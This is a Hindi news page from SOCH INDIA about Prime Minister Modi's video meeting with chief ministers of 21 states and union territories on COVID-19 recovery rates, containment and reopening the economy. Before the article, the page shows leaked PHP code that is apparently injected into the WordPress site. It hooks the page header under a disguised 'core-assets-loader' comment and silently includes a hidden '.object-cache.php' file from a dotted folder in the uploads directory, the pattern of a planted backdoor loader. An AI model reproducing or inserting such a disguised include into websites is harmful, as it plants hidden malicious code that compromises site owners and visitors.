add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पीएम मोदी बोले- अर्थव्यवस्था के पटरी पर लौटने के संकेत दिखने लगे हैं – SOCH INDIA
Menu

देश
पीएम मोदी बोले- अर्थव्यवस्था के पटरी पर लौटने के संकेत दिखने लगे हैं

nobanner

देश में बढ़े कोरोना संकट के बीच आज से दो दिनों की केंद्र और राज्यों की अहम बैठक शुरू हो गई है. प्रधानमंत्री नरेंद्र मोदी आज पंजाब,चंडीगढ़ समेत पहाड़ी और पूर्वोत्तर के राज्यों के साथ बैठक कर रहे हैं. मुख्यमंत्रियों से संवाद में पीएम मोदी ने कहा कि कोरोना वायरस से हुई किसी की भी मौत असहज करने वाली है.

पीएम मोदी ने कहा कि भविष्य में जब कभी भारत की कोरोना के खिलाफ लड़ाई का अध्ययन होगा, तो ये दौर इसलिए भी याद किया जाएगा कि कैसे इस दौरान हमने साथ मिलकर काम किया, Co-operative Federalism का सर्वोत्तम उदाहरण प्रस्तुत किया.

पीएम ने कहा कि दुनिया के बड़े-बड़े एक्सपर्ट्स, हेल्थ के जानकार, लॉकडाउन और भारत के लोगों द्वारा दिखाए गए अनुशासन की आज चर्चा कर रहे हैं. आज भारत में रिकवरी रेट 50 प्रतिशत से ऊपर है. आज भारत दुनिया के उन देशों में अग्रणी है जहां कोरोना संक्रमित मरीजों का जीवन बच रहा है.

पीएम मोदी ने कहा कि हमें इस बात का हमेशा ध्यान रखना है कि हम कोरोना को जितना रोक पाएंगे, उसका बढ़ना जितना रोक पाएंगे. उतना ही हमारी अर्थव्यवस्था खुलेगी, हमारे दफ्तर खुलेंगे, मार्केट खुलेंगे, ट्रांसपोर्ट के साधन खुलेंगे, और उतने ही रोजगार के नए अवसर भी बनेंगे.

दो दिनों की बैठक की शुरुआत में आज उन 21 राज्यों और केंद्र शासित प्रदेशों के सीएम और उपराज्यपाल शामिल हो रहे हैं, जहां बीस हजार से कम कोरोना के मामले हैं और डेढ़ सौ से कम लोगों की मौत हुई है. इन राज्यों में पहाड़ी राज्य, पूर्वोत्तर के राज्य और केंद्र शासित प्रदेश भी शामिल हैं.

 आज इन प्रदेशों के साथ बैठक

आज पीएम नरेंद्र मोदी पंजाब, चंडीगढ़, उत्तराखंड, हिमाचल, लद्दाख,झारखंड, छत्तीसगढ़ ,गोवा, केरल, पुडुचेरी,असम, त्रिपुरा, मेघालय, अरुणाचल , मिजोरम, सिक्किम, मणिपुर, नागालैंड , अंडमान-निकोबार , दादर नगर हवेली और दमन दीव ,लक्षद्वीप के सीएम और उपराज्यपाल से बात करेंगे.

 

बनाई जाएगी कोरोना से जंग की रणनीति

कोरोना वायरस के खतरे को देखते हुए पीएम नरेंद्र मोदी ने एक बार फिर मोर्चा संभाला है. मुख्यमंत्रियों के साथ फिर आज बैठक बुलाई है. वीडियो कॉन्फ्रेंसिंग के जरिए अलग-अलग राज्यों के साथ आज कोरोना वायरस से निपटने के लिए रणनीति तैयार की जाएगी. बैठक का मकसद कोरोना के खिलाफ जंग को तेज करना है.

 

छठवीं बार मुख्यमंत्रियों के साथ मंथन

मुख्यमंत्रियों के साथ छठी बैठक में कई बातों पर मंथन होगा. सूत्रों के मुताबिक, कोरोना की वजह से सबसे संक्रमित 20 जिलों पर जोर होगा. जिले के हिसाब से बेड, टेस्टिंग किट और दूसरी मेडिकल सुविधाओं पर चर्चा होगी. कोरोना से प्रभावित 6 राज्यों के बीच बेहतर तालमेल पर बातचीत होगी. साथ ही मानसून को देखते हुए तैयारियों की प्लानिंग की जाएगी.